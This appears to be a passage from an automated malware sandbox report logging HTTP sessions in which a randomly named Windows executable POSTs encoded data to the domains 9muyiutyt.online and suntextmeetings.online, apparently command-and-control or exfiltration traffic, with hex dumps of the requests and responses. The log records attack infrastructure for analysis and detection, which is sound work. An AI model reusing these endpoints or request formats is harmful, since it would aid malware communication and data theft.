                                                          Data Raw: 31 48 67 3d 78 2f 2f 31 41 4b 30 71 6c 4a 73 45 53 57 52 52 6a 6a 7a 6b 2b 48 52 30 61 31 70 37 2f 43 54 68 39 44 55 4e 2f 78 44 56 59 72 48 53 41 52 78 2f 4b 6b 67 6c 61 74 48 71 6d 6c 38 6b 62 4d 52 66 75 6c 76 6d 62 38 6a 72 52 58 39 76 42 52 71 46 48 61 5a 72 39 66 57 77 6c 4d 75 4b 37 54 36 56 4a 37 38 51 4e 37 6c 4f 2b 6a 52 38 77 6f 69 46 59 30 67 6c 33 37 49 32 61 5a 66 67 55 79 6b 78 57 4f 50 7a 53 2b 77 5a 33 43 68 70 63 38 6d 4b 67 66 6c 31 75 37 4f 41 37 56 52 6e 67 68 4e 76 6b 51 72 43 4a 74 4f 6a 67 4c 62 5a 4f 4f 58 47 6d 53 72 46 30 6b 79 76 34 57 4d 6b 54 79 50 44 52 2b 42 4f 34 74 45 3d
                                                          Data Ascii: 1Hg=x//1AK0qlJsESWRRjjzk+HR0a1p7/CTh9DUN/xDVYrHSARx/KkglatHqml8kbMRfulvmb8jrRX9vBRqFHaZr9fWwlMuK7T6VJ78QN7lO+jR8woiFY0gl37I2aZfgUykxWOPzS+wZ3Chpc8mKgfl1u7OA7VRnghNvkQrCJtOjgLbZOOXGmSrF0kyv4WMkTyPDR+BO4tE=
                                                          Jul 26, 2024 18:47:18.091609955 CEST432INHTTP/1.1 301 Moved Permanently
                                                          Server: nginx
                                                          Date: Fri, 26 Jul 2024 16:47:17 GMT
                                                          Content-Type: text/html
                                                          Content-Length: 162
                                                          Connection: close
                                                          Location: https://www.9muyiutyt.online/39t8/
                                                          Strict-Transport-Security: max-age=63072000; includeSubdomains; preload
                                                          Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                          Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          18192.168.2.555156154.218.3.243807156C:\Program Files (x86)\gbpubFqQDlEdUubIycEGbALhwRGmBmoyLPeZJVyYmzhdFTGKOwnWivArruVgDQZcIvzJxwqhWNWp\QnAcfZuONg.exe
                                                          TimestampBytes transferredDirectionData
                                                          Jul 26, 2024 18:47:19.727794886 CEST745OUTPOST /39t8/ HTTP/1.1
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                          Accept-Encoding: gzip, deflate
                                                          Accept-Language: en-US,en;q=0.5
                                                          Content-Type: application/x-www-form-urlencoded
                                                          Connection: close
                                                          Cache-Control: max-age=0
                                                          Content-Length: 224
                                                          Host: www.9muyiutyt.online
                                                          Origin: http://www.9muyiutyt.online
                                                          Referer: http://www.9muyiutyt.online/39t8/
                                                          User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
                                                          Data Raw: 31 48 67 3d 78 2f 2f 31 41 4b 30 71 6c 4a 73 45 64 53 56 52 77 79 7a 6b 72 58 52 31 45 6c 70 37 30 69 54 6c 39 44 59 4e 2f 77 48 46 59 39 76 53 41 78 42 2f 4e 56 67 6c 4a 64 48 71 74 46 38 68 45 63 52 75 75 6c 6a 75 62 2b 6e 72 52 58 70 76 42 51 32 46 48 4a 78 6b 39 50 57 79 78 38 75 49 32 7a 36 56 4a 37 38 51 4e 37 68 6f 2b 6a 5a 38 77 59 79 46 61 51 4d 6b 39 62 49 31 4b 4a 66 67 65 69 6b 50 57 4f 50 61 53 2f 39 43 33 47 52 70 63 35 61 4b 67 4b 5a 32 33 72 4f 47 2f 56 51 57 76 7a 38 71 73 44 33 34 4a 64 47 72 2f 71 44 66 50 34 36 73 38 77 6a 74 6e 45 65 58 6f 46 45 54 43 43 75 71 4c 64 52 2b 6d 36 51 67 48 47 63 35 50 70 75 58 57 36 6e 77 63 6c 56 62 55 39 63 76
                                                          Data Ascii: 1Hg=x//1AK0qlJsEdSVRwyzkrXR1Elp70iTl9DYN/wHFY9vSAxB/NVglJdHqtF8hEcRuuljub+nrRXpvBQ2FHJxk9PWyx8uI2z6VJ78QN7ho+jZ8wYyFaQMk9bI1KJfgeikPWOPaS/9C3GRpc5aKgKZ23rOG/VQWvz8qsD34JdGr/qDfP46s8wjtnEeXoFETCCuqLdR+m6QgHGc5PpuXW6nwclVbU9cv
                                                          Jul 26, 2024 18:47:20.695777893 CEST432INHTTP/1.1 301 Moved Permanently
                                                          Server: nginx
                                                          Date: Fri, 26 Jul 2024 16:47:20 GMT
                                                          Content-Type: text/html
                                                          Content-Length: 162
                                                          Connection: close
                                                          Location: https://www.9muyiutyt.online/39t8/
                                                          Strict-Transport-Security: max-age=63072000; includeSubdomains; preload
                                                          Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                          Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          19192.168.2.555157154.218.3.243807156C:\Program Files (x86)\gbpubFqQDlEdUubIycEGbALhwRGmBmoyLPeZJVyYmzhdFTGKOwnWivArruVgDQZcIvzJxwqhWNWp\QnAcfZuONg.exe
                                                          TimestampBytes transferredDirectionData
                                                          Jul 26, 2024 18:47:22.308600903 CEST1762OUTPOST /39t8/ HTTP/1.1
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                          Accept-Encoding: gzip, deflate
                                                          Accept-Language: en-US,en;q=0.5
                                                          Content-Type: application/x-www-form-urlencoded
                                                          Connection: close
                                                          Cache-Control: max-age=0
                                                          Content-Length: 1240
                                                          Host: www.9muyiutyt.online
                                                          Origin: http://www.9muyiutyt.online
                                                          Referer: http://www.9muyiutyt.online/39t8/
                                                          User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
                                                          Data Raw: 31 48 67 3d 78 2f 2f 31 41 4b 30 71 6c 4a 73 45 64 53 56 52 77 79 7a 6b 72 58 52 31 45 6c 70 37 30 69 54 6c 39 44 59 4e 2f 77 48 46 59 39 58 53 41 43 4a 2f 4f 79 30 6c 59 74 48 71 6b 6c 38 67 45 63 52 7a 75 6c 37 69 62 2b 37 52 52 55 52 76 42 79 2b 46 51 49 78 6b 33 50 57 79 75 73 75 4e 37 54 37 42 4a 36 4d 55 4e 37 52 6f 2b 6a 5a 38 77 61 36 46 65 45 67 6b 37 62 49 32 61 5a 66 6b 55 79 6c 69 57 4f 58 67 53 2f 6f 33 30 31 5a 70 63 5a 71 4b 6e 38 4e 32 6f 37 4f 45 78 31 51 4f 76 7a 77 68 73 44 71 44 4a 65 62 77 2f 72 33 66 4f 4f 48 55 6c 43 54 75 6b 56 79 79 74 43 41 70 54 30 75 38 4d 37 70 57 72 4a 39 43 43 31 64 55 4e 76 61 73 53 59 2b 31 66 45 6f 4a 46 4c 6c 76 59 52 59 42 4f 53 36 61 50 41 44 52 7a 53 51 74 66 38 63 4a 46 48 6e 74 42 4b 33 6d 51 48 47 74 69 71 2b 51 68 49 55 57 63 49 68 62 58 65 57 38 47 73 30 7a 2b 37 6a 6e 61 72 43 49 75 6f 47 6c 63 4a 64 4f 69 45 36 57 74 6d 6d 6f 4d 7a 55 38 6c 73 47 72 6e 44 58 43 75 71 38 31 50 4d 58 70 47 6d 4b 61 31 64 31 31 39 46 53 78 70 64 74 7a 46 4e [TRUNCATED]
                                                          Data Ascii: 1Hg=x//1AK0qlJsEdSVRwyzkrXR1Elp70iTl9DYN/wHFY9XSACJ/Oy0lYtHqkl8gEcRzul7ib+7RRURvBy+FQIxk3PWyusuN7T7BJ6MUN7Ro+jZ8wa6FeEgk7bI2aZfkUyliWOXgS/o301ZpcZqKn8N2o7OEx1QOvzwhsDqDJebw/r3fOOHUlCTukVyytCApT0u8M7pWrJ9CC1dUNvasSY+1fEoJFLlvYRYBOS6aPADRzSQtf8cJFHntBK3mQHGtiq+QhIUWcIhbXeW8Gs0z+7jnarCIuoGlcJdOiE6WtmmoMzU8lsGrnDXCuq81PMXpGmKa1d119FSxpdtzFNqEeQOAlghGe9EvRGSf6WE464LHVvWFnpakrAiNLVG8G/ti0HvaTs6fbx0M0f6mt5rkJXV2X9gKQfmhjurDMx9oZtL1WWw1i5eKdLanqDbtBu7YV/gof7ydeVV47zA/dDEe9ISKh/gKjhCj7Da2IKSNC8shPNN/rEqlSe2nlYg8SEUkNK6En34kAj+398qPMdSMJh6AuVKjBTuEXWagileg7S0RqU52urpyjtXvP+yayrof94UrcY/U5OGlOAc/HKGRil8M9UDx7inxlN1NYFKOywLQ2X9p6icRyLTyR0t004y93K7jzhfz6bRhLp6NRaMXsQuzh0fLExoZKV6AbgfjLpaYiLVPqTS9do4sZNDA+JijsyWO/TOZWfcC6Xesjntb2cz2XV5Ggu0At3V6I7uWEIS0rWAuAcm/sW3bjHRH/vqYolEGS3sHlt/DNhB1xouPyUWwwfAwbvXU0/kPcFuM5O3cPtpSFhj31qc/Gjgh5DRnVQ1r6FM4wVHq0luYb7DZC5KkK3lFSozD/cj/zXCu39xyX+pUba8CK5bLtTDPKnMpbAFyf5iLdVKUF2Z5AIW68rcJvy005x/RPhdeeE52N2dxzXzVPXO5XkcRDwpS5iDul6eNuNgKa8xlCvLqFsH74CiWzNzIBmez+9n7qUc24TO6BONqdr8U [TRUNCATED]
                                                          Jul 26, 2024 18:47:23.454579115 CEST432INHTTP/1.1 301 Moved Permanently
                                                          Server: nginx
                                                          Date: Fri, 26 Jul 2024 16:47:23 GMT
                                                          Content-Type: text/html
                                                          Content-Length: 162
                                                          Connection: close
                                                          Location: https://www.9muyiutyt.online/39t8/
                                                          Strict-Transport-Security: max-age=63072000; includeSubdomains; preload
                                                          Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                          Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          20192.168.2.555158154.218.3.243807156C:\Program Files (x86)\gbpubFqQDlEdUubIycEGbALhwRGmBmoyLPeZJVyYmzhdFTGKOwnWivArruVgDQZcIvzJxwqhWNWp\QnAcfZuONg.exe
                                                          TimestampBytes transferredDirectionData
                                                          Jul 26, 2024 18:47:24.889914036 CEST470OUTGET /39t8/?ejlto=QtkhctgpxJahPP0&1Hg=89XVD+Uem60dZ1sDkhzA52EMF3du5QagyTQWgC74INncPQoYck8yZMKmhHYNHaZtvErKW4LDM1h+RSXnGPYlre6VurbK/jTyWP4vAbFcilh1x/G4ZSBU3Zl0LqnbfRVoCA== HTTP/1.1
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                          Accept-Language: en-US,en;q=0.5
                                                          Connection: close
                                                          Host: www.9muyiutyt.online
                                                          User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
                                                          Jul 26, 2024 18:47:25.866499901 CEST591INHTTP/1.1 301 Moved Permanently
                                                          Server: nginx
                                                          Date: Fri, 26 Jul 2024 16:47:25 GMT
                                                          Content-Type: text/html
                                                          Content-Length: 162
                                                          Connection: close
                                                          Location: https://www.9muyiutyt.online/39t8/?ejlto=QtkhctgpxJahPP0&1Hg=89XVD+Uem60dZ1sDkhzA52EMF3du5QagyTQWgC74INncPQoYck8yZMKmhHYNHaZtvErKW4LDM1h+RSXnGPYlre6VurbK/jTyWP4vAbFcilh1x/G4ZSBU3Zl0LqnbfRVoCA==
                                                          Strict-Transport-Security: max-age=63072000; includeSubdomains; preload
                                                          Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                          Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          21192.168.2.555159148.66.138.133807156C:\Program Files (x86)\gbpubFqQDlEdUubIycEGbALhwRGmBmoyLPeZJVyYmzhdFTGKOwnWivArruVgDQZcIvzJxwqhWNWp\QnAcfZuONg.exe
                                                          TimestampBytes transferredDirectionData
                                                          Jul 26, 2024 18:47:30.980041027 CEST743OUTPOST /1wd4/ HTTP/1.1
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                          Accept-Encoding: gzip, deflate
                                                          Accept-Language: en-US,en;q=0.5
                                                          Content-Type: application/x-www-form-urlencoded
                                                          Connection: close
                                                          Cache-Control: max-age=0
                                                          Content-Length: 204
                                                          Host: www.suntextmeetings.online
                                                          Origin: http://www.suntextmeetings.online
                                                          Referer: http://www.suntextmeetings.online/1wd4/
                                                          User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
                                                          Data Raw: 31 48 67 3d 66 65 76 38 55 6b 36 4e 63 36 36 35 56 35 72 73 58 6d 64 39 6a 53 35 59 41 79 53 52 4a 64 6f 41 6a 44 35 54 64 75 46 70 6e 47 2b 6e 68 30 38 4c 38 5a 79 6d 4a 66 45 65 68 55 6c 46 6c 42 76 61 50 79 71 6c 57 65 66 67 55 30 79 61 54 34 50 35 71 66 71 6d 30 57 67 59 70 58 38 37 72 4f 6f 78 68 70 71 4d 2f 45 6c 71 4c 2f 47 75 50 50 66 56 41 4a 44 55 77 59 47 69 71 42 4a 54 49 41 50 55 6a 4e 51 70 63 6a 36 53 5a 49 32 2f 62 43 2f 69 57 65 64 64 5a 65 4f 74 49 54 4e 4c 4c 57 44 4e 4c 32 56 47 4d 67 69 45 54 75 6b 51 57 2f 2b 31 61 64 6a 79 43 6b 36 2f 54 7a 34 63 44 4e 46 6c 67 62 6e 5a 48 7a 45 3d
                                                          Data Ascii: 1Hg=fev8Uk6Nc665V5rsXmd9jS5YAySRJdoAjD5TduFpnG+nh08L8ZymJfEehUlFlBvaPyqlWefgU0yaT4P5qfqm0WgYpX87rOoxhpqM/ElqL/GuPPfVAJDUwYGiqBJTIAPUjNQpcj6SZI2/bC/iWeddZeOtITNLLWDNL2VGMgiETukQW/+1adjyCk6/Tz4cDNFlgbnZHzE=
                                                          Jul 26, 2024 18:47:31.941521883 CEST479INHTTP/1.1 404 Not Found
                                                          Date: Fri, 26 Jul 2024 16:47:31 GMT
                                                          Server: Apache
                                                          Content-Length: 315
                                                          Connection: close
                                                          Content-Type: text/html; charset=iso-8859-1
                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                          Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          22192.168.2.555160148.66.138.133807156C:\Program Files (x86)\gbpubFqQDlEdUubIycEGbALhwRGmBmoyLPeZJVyYmzhdFTGKOwnWivArruVgDQZcIvzJxwqhWNWp\QnAcfZuONg.exe
                                                          TimestampBytes transferredDirectionData
                                                          Jul 26, 2024 18:47:33.567893982 CEST763OUTPOST /1wd4/ HTTP/1.1
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                          Accept-Encoding: gzip, deflate
                                                          Accept-Language: en-US,en;q=0.5
                                                          Content-Type: application/x-www-form-urlencoded
                                                          Connection: close
                                                          Cache-Control: max-age=0
                                                          Content-Length: 224
                                                          Host: www.suntextmeetings.online
                                                          Origin: http://www.suntextmeetings.online
                                                          Referer: http://www.suntextmeetings.online/1wd4/
                                                          User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
                                                          Data Raw: 31 48 67 3d 66 65 76 38 55 6b 36 4e 63 36 36 35 48 6f 62 73 62 6e 64 39 68 79 35 5a 65 69 53 52 44 39 6f 45 6a 44 31 54 64 73 70 35 6d 30 4b 6e 67 56 4d 4c 74 6f 79 6d 49 66 45 65 30 6b 6c 63 6f 68 76 72 50 79 57 48 57 61 62 67 55 30 6d 61 54 39 72 35 71 4d 43 6c 79 57 67 57 6c 33 38 44 6c 75 6f 78 68 70 71 4d 2f 45 78 41 4c 37 71 75 50 2b 76 56 44 73 76 54 7a 59 47 68 74 42 4a 54 4d 41 50 51 6a 4e 52 4f 63 6e 69 6f 5a 4c 4f 2f 62 48 44 69 57 4d 6c 61 53 65 4f 33 45 44 4d 34 50 69 62 41 44 67 6c 55 48 32 75 47 4b 73 6b 34 54 4a 54 66 41 2f 72 61 52 45 57 48 44 67 77 72 53 39 6b 4d 36 34 33 70 5a 6b 53 46 37 67 37 4b 2f 50 66 6b 57 7a 6f 6a 48 56 35 65 56 67 6f 5a
                                                          Data Ascii: 1Hg=fev8Uk6Nc665Hobsbnd9hy5ZeiSRD9oEjD1Tdsp5m0KngVMLtoymIfEe0klcohvrPyWHWabgU0maT9r5qMClyWgWl38DluoxhpqM/ExAL7quP+vVDsvTzYGhtBJTMAPQjNROcnioZLO/bHDiWMlaSeO3EDM4PibADglUH2uGKsk4TJTfA/raREWHDgwrS9kM643pZkSF7g7K/PfkWzojHV5eVgoZ
                                                          Jul 26, 2024 18:47:34.529320002 CEST479INHTTP/1.1 404 Not Found
                                                          Date: Fri, 26 Jul 2024 16:47:34 GMT
                                                          Server: Apache
                                                          Content-Length: 315
                                                          Connection: close
                                                          Content-Type: text/html; charset=iso-8859-1
                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                          Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          23192.168.2.555161148.66.138.133807156C:\Program Files (x86)\gbpubFqQDlEdUubIycEGbALhwRGmBmoyLPeZJVyYmzhdFTGKOwnWivArruVgDQZcIvzJxwqhWNWp\QnAcfZuONg.exe
                                                          TimestampBytes transferredDirectionData
                                                          Jul 26, 2024 18:47:36.140595913 CEST1780OUTPOST /1wd4/ HTTP/1.1
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                          Accept-Encoding: gzip, deflate
                                                          Accept-Language: en-US,en;q=0.5
                                                          Content-Type: application/x-www-form-urlencoded
                                                          Connection: close
                                                          Cache-Control: max-age=0
                                                          Content-Length: 1240
                                                          Host: www.suntextmeetings.online
                                                          Origin: http://www.suntextmeetings.online
                                                          Referer: http://www.suntextmeetings.online/1wd4/
                                                          User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
                                                          Data Raw: 31 48 67 3d 66 65 76 38 55 6b 36 4e 63 36 36 35 48 6f 62 73 62 6e 64 39 68 79 35 5a 65 69 53 52 44 39 6f 45 6a 44 31 54 64 73 70 35 6d 30 79 6e 67 6e 45 4c 2f 2f 6d 6d 4f 76 45 65 6f 30 6c 42 6f 68 76 4d 50 79 4f 44 57 61 57 56 55 32 65 61 51 62 33 35 39 74 43 6c 68 32 67 57 72 6e 38 34 72 4f 70 72 68 70 36 41 2f 45 68 41 4c 37 71 75 50 38 6e 56 56 4a 44 54 31 59 47 69 71 42 4a 50 49 41 50 34 6a 4e 5a 30 63 6e 76 4b 5a 37 75 2f 62 6e 7a 69 55 35 4a 61 52 2b 4f 78 48 44 4d 67 50 6e 43 41 44 67 52 59 48 32 7a 6a 4b 75 6b 34 52 65 71 6d 58 37 6a 58 46 56 47 61 58 69 55 31 48 59 4a 31 36 4f 69 5a 57 6b 4b 7a 78 77 76 5a 34 36 6a 53 57 52 70 45 51 69 39 34 46 30 42 45 56 39 48 59 51 34 43 35 77 6a 4e 4e 58 47 33 4f 5a 2f 65 53 47 49 2b 6e 44 51 78 72 39 49 52 69 53 51 58 6d 61 45 4b 38 2b 54 46 45 6b 4d 44 52 78 48 48 6b 65 6b 67 76 43 76 75 44 47 59 54 38 42 43 6c 46 42 6d 33 4c 5a 63 32 4b 58 51 53 67 34 66 75 62 76 6d 48 52 42 72 37 70 66 76 55 72 45 56 4c 6d 6f 76 2f 70 42 56 46 78 44 48 57 57 62 4e [TRUNCATED]
                                                          Data Ascii: 1Hg=fev8Uk6Nc665Hobsbnd9hy5ZeiSRD9oEjD1Tdsp5m0yngnEL//mmOvEeo0lBohvMPyODWaWVU2eaQb359tClh2gWrn84rOprhp6A/EhAL7quP8nVVJDT1YGiqBJPIAP4jNZ0cnvKZ7u/bnziU5JaR+OxHDMgPnCADgRYH2zjKuk4ReqmX7jXFVGaXiU1HYJ16OiZWkKzxwvZ46jSWRpEQi94F0BEV9HYQ4C5wjNNXG3OZ/eSGI+nDQxr9IRiSQXmaEK8+TFEkMDRxHHkekgvCvuDGYT8BClFBm3LZc2KXQSg4fubvmHRBr7pfvUrEVLmov/pBVFxDHWWbNpx6jdiaF3hJPcS0gdozYNPNgztogTUm+V/vJMe9STCly81nPe6gHqo74zncvJDkAzk68IvfmDHUOgYZr1KqnzvZz8ztUcHpu8kICauMt7V5mScj2wnMqfkYrlBDajHn8nPHzqIinZ20s1ADB22mQGRV4kY/3HQxAWIBMBqOxKXEWDpCS44Whv5z80sCLaR8VH56yD/+5pSo/n1JAlNQg0kkVEtJVs72W4xmeQ4Uteka6YMmAFssRmwPq4h4yE4IG4YfIm44AYxKnsEXTzK+DCcOYeI1ye/ZlOb7HVALq/VCoJwr9GKlGXuR3f9IK0R0uuCtooe71a973m3kch7QQ0jVvgvR6OD+IVdiWS5ZELaryn3P0R+/li+g7d/dLyu5CQob25FFz9aLcVLBRd+jqvvG8faGsCo2Fk8JAIE0UgFH6a18map9pt7SdEjaU/SZXH01MpF3XzlVRPcHPRBHKMNGZaDb/22e9nSXRDIqHlSkcQbVblxL1ODmz18PRY8NDNTGE21kWqYJfNFze3xvluENGdi6SjC0NLrogPrjUR0kq1wIiQGuMHA8y0Q0wdk3V6DtesHK387hYkl4d7TXnG2X79wCv2nnGyMyXth48yId7LzO1zNphw3PHMPUYlSFHdnmlMs3aE8DMcqtGNCmP58PY1EQzeEAbPP [TRUNCATED]
                                                          Jul 26, 2024 18:47:37.379759073 CEST479INHTTP/1.1 404 Not Found
                                                          Date: Fri, 26 Jul 2024 16:47:36 GMT
                                                          Server: Apache
                                                          Content-Length: 315
                                                          Connection: close
                                                          Content-Type: text/html; charset=iso-8859-1
